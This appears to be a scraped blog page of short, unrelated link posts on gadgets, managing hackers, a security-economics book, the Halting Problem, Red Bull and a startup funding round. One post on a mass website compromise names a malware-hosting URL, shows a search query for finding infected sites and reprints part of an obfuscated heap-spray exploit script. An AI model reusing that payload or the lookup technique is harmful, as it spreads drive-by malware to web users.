I must make this

YouTube - How to make a BristleBot - Evil Mad Scientist Laboratories

Many execs will tell you the same thing about their role in the eco-system.. but what they miss is that they do not need for this to be a zero sum game. i.e. Achilles does not want to be king, and he certainly doesnt want to concern himself with collecting taxes. He will gladly serve as a soldier to a king who proves himself worthy. This ties in pretty closely to Paul Grahams thoughts on your super hackers and remuneration:

"Economically, this is a fact of the greatest importance, because it means you don't have to pay great hackers anything like what they're worth. A great programmer might be ten or a hundred times as productive as an ordinary one, but he'll consider himself lucky to get paid three times as much."

Everything i needed to know about managing hackers, i learnt from my DVD collection

... and I abuse my admin privileges from time to time :-)

So where's my moral parallel?

YouTube - Amy Winehouse - Amy, Amy, Amy

Why is information security so dysfunctional? Are you wasting the money you spend on security? This book shows how to spend it more effectively. How can you make more effective security decisions? This book explains why professionals have taken to studying economics, not cryptography--and why you should, too. And why security breach notices are the best thing to ever happen to information security. It’s about time someone asked the biggest, toughest questions about information security. Security experts Adam Shostack and Andrew Stewart don’t just answer those questions--they offer honest, deeply troubling answers. They explain why these critical problems exist and how to solve them. Drawing on powerful lessons from economics and other disciplines, Shostack and Stewart offer a new way forward. In clear and engaging prose, they shed new light on the critical challenges that are faced by the security field. Whether you’re a CIO, IT manager, or security specialist, this book will open your eyes to new ways of thinking about--and overcoming--your most pressing security challenges. The New School enables you to take control, while others struggle with non-stop crises.null

Go Adam! Congrats on getting this out the door! We can exchange signed copies at RSA.

The New School of Information Security

The case of the Halting Problem is often brought up to suggest that it is impossible to write perfect application security assessment tools. While this is formally true, take the limitations posed upon the abilities of static code analysis tools for example (true, but static code analysis tools are useful regardless, more on this below), I’ve come across numerous situations where people invoke the Halting Problem to form irrational arguments. The conclusions reached in these situations may end up being true, but the arguments are themselves illogical if the premises and inference do not flow into the conclusion.

Interesting tack. Invoking terms incorrect is something that plagues many industries, including security.

Illogical Arguments in the Name of Alan Turing

McAfee is talking about a massive website compromise thats using JavaScript to drop malware. The attacker(s) is injecting tags into the title of the pages. McAfee researchers are jackholes who don't want to share the wealth and thus don't provide any links or insight into the code.

However, based on the vector the attackers are using (inejcting into <title> tag) the simple Google query intitle: <script src=http will show you the sites that are infected and where you can fetch code. Some of the websites serving the Malware require you to spoof a Referer header to receive the actual malware. Here is one example with a little pass through a JavaScript analyzer.

http://b.njnk.net:80/E/J.JS

var z1IlbQFl0X = 0;
var z1IlaxFl0X = 0;
var z1IlbPFl0X = 1;
var z1IlbiFl0X = 0;
var z1IlbCFl0X = 0;
var z1IlbHFl0X = 0;
var z1IlbIFl0X = 0;
var z1IlbfFl0X = "use" + "rid1" + "AF9122";
var z1IlbcFl0X = "20";
var z1IlaoFl0X = "a.n" + "jnk." + "net";
var z1IlbGFl0X = 0, z1IlbzFl0X = 0, z1IlaHFl0X = 0;
var z1IlaAFl0X = "";
var z1IlanFl0X = 0;
var z1IlapFl0X = 0, z1IlaOFl0X = 0, z1IlaKFl0X = 0, z1IlaLFl0X = 0;
var z1IlamFl0X = "n" + "one";
var z1IlcqFl0X;
var z1IlaSFl0X = 0;
{
    if(z1IlbQFl0X) {
        document.getElementsByTagName("bod" + "y") [ 0] .innerHTML += z1IlcFFl0X + "<b" + "r>";
        
    }
}
{
    if(z1IlbQFl0X) {
        alert(z1IlcFFl0X);
        
    }
}
function x0r1aU2Z(name) {
    var z1IlaFFl0X = document.cookie;
    var z1IlaJFl0X = name + "=";
    if(! z1IlaFFl0X) {
        return null;
        
    }
    var z1IlaDFl0X = z1IlaFFl0X.indexOf("; " + z1IlaJFl0X);
    if(z1IlaDFl0X == - 1) {
        z1IlaDFl0X = z1IlaFFl0X.indexOf(z1IlaJFl0X);
        if(z1IlaDFl0X != 0) {
            return null;
            
        }
    }
    else {
        z1IlaDFl0X += 2;
        
    }
    var z1IlbqFl0X = document.cookie.indexOf(";", z1IlaDFl0X);
    if(z1IlbqFl0X == - 1) {
        z1IlbqFl0X = z1IlaFFl0X.length;
        
    }
    return unescape(z1IlaFFl0X.substring(z1IlaDFl0X + z1IlaJFl0X.length, z1IlbqFl0X));
    
};
function x0r1aR2Z(name, value) {
    var exp = new Date();
    var z1IlbVFl0X = exp.getTime() + (365 * 1 * 24 * 60 * 60 * 1000);
    exp.setTime(z1IlbVFl0X);
    var z1IlbYFl0X = name + "=" + escape(value) + "; e" + "xpires" + "=" + exp.toGMTString();
    document.cookie = z1IlbYFl0X;
    
};
function x0r1ax2Z(z1IlakFl0X, z1IlalFl0X) {
    while(z1IlakFl0X.length * 2 < z1IlalFl0X) {
        z1IlakFl0X += z1IlakFl0X;
        
    }
    z1IlakFl0X = z1IlakFl0X.substring(0, z1IlalFl0X / 2);
    return z1IlakFl0X;
    
};
function z1IltFl0X() {
    if(z1IlaSFl0X > 0) {
        return;
        
    }
    try {
        var z1IlbaFl0X = 0 x0c0c0c0c;
        var z1IlarFl0X = unescape("%" + "ueb55㍮%" + "u64c" + ... [ Read More (3.0k in body) ]
JavaScript from Mass Compromise

Health concerns over the Red Bull energy drink were fuelled yesterday after Europe's highest court upheld a French ban on the product.

The fizzy drink has been linked to several deaths and some experts have criticized its high levels of caffeine and other stimulants.

Red Bull is Britain's best-selling energy drink, with 213 million cans consumed last year. It has been dubbed the 'clubbers' drink', and is often mixed with vodka. The popular adverts claiming that Red Bull 'gives you wings', have led to the brand being described as 'the Porsche of soft drinks'.

Red bull + Vodka = the most self destructive drink evah!

French ban on Red Bull (drink) upheld by European Court

So for the last 24 hours or so I've been flooded with pictures of what a $4300+ call girl looks like. Which lead me to wonder what would be involved that costs $4300. Which lead me to thinking about my friend Kaiser, whom I met several years back some of the odd hacker/geek social circles in Atlanta (Billy -> Mike -> Timball -> (Ryan | K | Kaiser | ...)

Kaiser is a odd duck and one of the things he does is apply a zero to 4 star rating to Everything. Taco Cabana? 3 out of 4 stars. Which lead me to think about Kaiser's ever elusive 4 out of 4 stars. I only know of 2 things that have received 4 out of 4 stars from Kaiser, and both are on par with the services a $4300 a night call girl.

Memestreamer Cyan got $7 million in funding for Zivity!

The site allows both amateur and professional models and photographers to show their stuff. Users vote on those that they like, which channel real dollars to the talent. The more votes, the more money. The basic site is free, but users must pay to vote. About 40% of gross revenue is given directly to the talent. With a recent redesign, the site is focused much more on social networking - users and talent have profile pages and can add each other as friends. They’ve even added a news feed feature that shows who is adding who as friends, and which models users have voted for.

Go Cyan!

Zivity Takes $7 Million In Venture Financing